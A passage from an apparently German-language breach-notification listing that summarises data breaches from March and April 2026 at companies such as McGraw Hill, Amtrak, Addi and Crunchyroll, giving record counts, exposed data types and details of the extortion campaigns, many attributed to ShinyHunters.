| Email addresses, Employers, Job titles, Names, Phone numbers, Physical addresses In April 2026, the commercial real estate brokerage firm Marcus & Millichap was named as one of multiple alleged victims of the ShinyHunters hacking and extortion group. Data alleged to have been obtained from the company was subsequently released publicly and included 1.8M unique email addresses, along with names, phone numbers and employment-related information including employer, job title and physical company address. In their disclosure notice, Marcus & Millichap advised that data which may have been accessed appeared limited to "company forms, templates, marketing materials, and general contact information". |
||
| 12.04.2026 - Mytheresa | 84.108 Datensätze geleaked | |
| Email addresses, Names, Partial credit card data, Phone numbers, Physical addresses, Purchases, Salutations In April 2026, the luxury fashion e-commerce platform Mytheresa was listed as a victim of the ShinyHunters "pay or leak" extortion group. After the ransom deadline passed, the group publicly released the data which contained 84k unique email addresses. The exposed data also included names, phone numbers, physical addresses, purchases and partial credit card data including card type, last 4 digits and expiry date. |
||
| 10.04.2026 - McGraw Hill | 13.500.136 Datensätze geleaked | |
| Email addresses, Names, Phone numbers, Physical addresses In April 2026, education company McGraw Hill confirmed a data breach following an extortion attempt. Attributed to a Salesforce misconfiguration, the company stated the incident exposed "a limited set of data from a webpage hosted by Salesforce on its platform". More than 100GB of data was later publicly distributed, containing 13.5M unique email addresses across multiple files, with additional fields such as name, physical address and phone number appearing inconsistently across some records. |
||
| 08.04.2026 - 7-Eleven | 185.256 Datensätze geleaked | |
| Dates of birth, Email addresses, Names, Phone numbers, Physical addresses In April 2026, 7-Eleven was the victim of a "pay or leak" extortion campaign by ShinyHunters, with the data later published that month. The incident exposed 185k unique email addresses, along with names, physical addresses, dates of birth and phone numbers. A small number of records also contained additional exposed data fields. The company later advised the breach was limited to "certain 7-Eleven systems used to store franchisee documents", a statement consistent with the exposed data. |
||
| 07.04.2026 - My Lovely AI | 106.271 Datensätze geleaked | |
| Email addresses, Social media profiles In April 2026, the NSFW AI girlfriend platform My Lovely AI suffered a data breach that exposed over 100k users. The data included user-created prompts and links to the resulting AI-generated images, along with a small number of Discord and X usernames. |
||
| 06.04.2026 - LegionProxy | 10.144 Datensätze geleaked | |
| Email addresses, Names, Passwords, Purchases In April 2026, the commercial residential and ISP proxy network LegionProxy suffered a data breach. The incident exposed 10k email addresses, bcrypt password hashes, names and purchases. |
||
| 03.04.2026 - Amtrak | 2.147.679 Datensätze geleaked | |
| Email addresses, Names, Physical addresses, Support tickets In April 2026, the hacking group ShinyHunters claimed they had breached Amtrak. The group typically compromises organisations' Salesforce instances before demanding a ransom and later, if not paid, dumping the data publicly. They subsequently published the alleged data which contained over 2M unique email addresses along with names, physical addresses and customer support records. |
||
| 02.04.2026 - SongTrivia2 | 291.739 Datensätze geleaked | |
| Auth tokens, Avatars, Email addresses, Names, Passwords, Usernames In April 2026, the music trivia platform SongTrivia2 suffered a data breach that was subsequently published to a public hacking forum. The data contained a total of 291k unique email addresses sourced from either Google OAuth logins or accounts created on the site, the latter also containing bcrypt password hashes. The data also included names, usernames and avatars. |
||
| 31.03.2026 - Hallmark | 1.736.520 Datensätze geleaked | |
| Email addresses, Names, Phone numbers, Physical addresses, Support tickets In March 2026, Hallmark suffered an alleged breach and subsequent extortion after attackers gained access to data stored within Salesforce. The data was later published after the extortion deadline passed, exposing 1.7M unique email addresses across both Hallmark and the Hallmark+ streaming service, along with names, phone numbers, physical addresses and support tickets. |
||
| 27.03.2026 - ZenBusiness | 5.118.184 Datensätze geleaked | |
| Email addresses, Names, Phone numbers In March 2026, the hacker and extortion group "ShinyHunters" claimed to have obtained a substantial corpus of data from ZenBusiness, a business formation and compliance platform. The group claimed the data had been exfiltrated from platforms including Snowflake, Mixpanel and Salesforce, and threatened to publish it if a ransom was not paid. The following month, after claiming payment had not been made, ShinyHunters publicly released the data. The collection amounted to many terabytes across thousands of files that appeared to originate from multiple systems and business functions, including leads, support records and other CRM-related data. The data contained approximately 5M unique email addresses, often accompanied by name and phone number depending on the source file. |
||
| 26.03.2026 - BreachForums Version 5 | 339.778 Datensätze geleaked | |
| Email addresses, Passwords, Usernames In March 2026, a breach of one of the many iterations of the BreachForums hacking forum known as "Version 5" was publicly disclosed. The incident exposed 340k unique email addresses along with usernames and argon2 password hashes. |
||
| 25.03.2026 - Addi | 34.532.941 Datensätze geleaked | |
| Age groups, Credit scores, Device information, Email addresses, Government issued IDs, Income levels, IP addresses, Latitude and longitude pairs, Names, Phone numbers, Physical addresses, Purchases, Socioeconomic levels In March 2026, the Colombian fintech company Addi identified unauthorised activity on its platform and advised customers that "it is possible that your personal information may have been compromised". The "pay or leak" extortion group ShinyHunters subsequently claimed responsibility and published a large trove of personal data allegedly obtained from Addi. The data included 34M unique email addresses from credit scoring requests, credit bureau records, customer identity records and email validation logs. It also contained government issued IDs (Cédula de Ciudadanía), estimated income, socioeconomic levels, purchases and other credit-related data points. |
||
| 25.03.2026 - Sound Radix | 292.993 Datensätze geleaked | |
| Email addresses, Names, Passwords In March 2026, the audio production tools company Sound Radix disclosed a data breach that they subsequently self-submitted to HIBP. The incident impacted 293k unique email addresses and names. Sound Radix advised that it is possible that additional data including hashed passwords may have been exposed, and that no financial or credit card information was impacted. |
||
| 19.03.2026 - Berkadia | 305.216 Datensätze geleaked | |
| Email addresses, Employers, Names, Phone numbers, Physical addresses In March 2026, the commercial real estate finance company Berkadia was the target of a ShinyHunters "pay or leak" extortion campaign. The group subsequently published data they alleged was taken from Berkadia's Salesforce instance, including over 300k unique email addresses as well as names, physical addresses and phone numbers, among other data. |
||
| 18.03.2026 - Infinite Campus | 137.123 Datensätze geleaked | |
| Email addresses, Employers, Job titles, Names, Phone numbers, Physical addresses, Support tickets, Usernames In March 2026, the student information system Infinite Campus was targeted in a ShinyHunters "pay or leak" extortion campaign. The group subsequently published data they alleged was taken from Infinite Campus, containing 137k unique email addresses along with names, phone numbers, physical addresses and support tickets. Infinite Campus subsequently sent notifications, advising that the exposed data largely consisted of "names and contact information for school staff" and that "the majority is directory information commonly found on school websites". |
||
| 13.03.2026 - Divine Skins | 105.814 Datensätze geleaked | |
| Email addresses, Purchases, Usernames In March 2026, the League of Legends custom skins service Divine Skins suffered a data breach. The incident was disclosed via the service's Discord server, where Divine Skins stated that an unauthorised third party accessed part of its systems, deleted all skins from the database and exposed email addresses and usernames. The data also contained a history of purchases made by users. |
||
| 12.03.2026 - Crunchyroll | 1.195.684 Datensätze geleaked | |
| Email addresses In March 2026, the anime streaming service Crunchyroll suffered a data breach alleged to have impacted 6.8M users. The exposed data is reported to have originated from the company's Zendesk support system where "name, login name, email address, IP address, general geographic location and the contents of the support tickets" were exposed. A subset of 1.2M email addresses from an alleged 2M record dataset being sold was later provided to HIBP. |
||
| 08.03.2026 - Baydöner | 1.266.822 Datensätze geleaked | |
| Dates of birth, Email addresses, Genders, Geographic locations, Government issued IDs, Names, Passwords, Phone numbers, Purchases In March 2026, the Turkish restaurant chain Baydöner suffered a data breach which was subsequently published to a public hacking forum. The incident exposed over 1.2M unique email addresses along with names, phone numbers, cities of residence and plaintext passwords. A small number of records also included Turkish national ID number and date of birth. In their disclosure notice, Baydöner stated that payment and financial data was not affected. |
||
| 06.03.2026 - Aura | 903.080 Datensätze geleaked | |
| Customer service comments, Email addresses, IP addresses, Names, Phone numbers, Physical addresses In March 2026, the online safety service Aura disclosed a data breach that exposed 900k unique email addresses. The data was primarily associated with a marketing tool from a previously acquired company, with fewer than 20k active Aura customers affected. Exposed data included names, phone numbers, physical and IP addresses, and customer service notes. Aura advised that no Social Security numbers, passwords or financial information were compromised. |
||
| 04.03.2026 - SUCCESS | 253.510 Datensätze geleaked | |
| Device information, Email addresses, IP addresses, Names, Passwords, Phone numbers, Physical addresses, Purchases In March 2026, the personal development and achievement media brand SUCCESS suffered a data breach. The incident exposed 250k unique email addresses along with names, IP addresses, phone numbers and, for a limited number of staff members, bcrypt password hashes. The data also included orders containing physical addresses and the payment method used. In SUCCESS' disclosure notice, they advised their system had also been abused to send offensive newsletters with quotes falsely attributed to contributors. |
||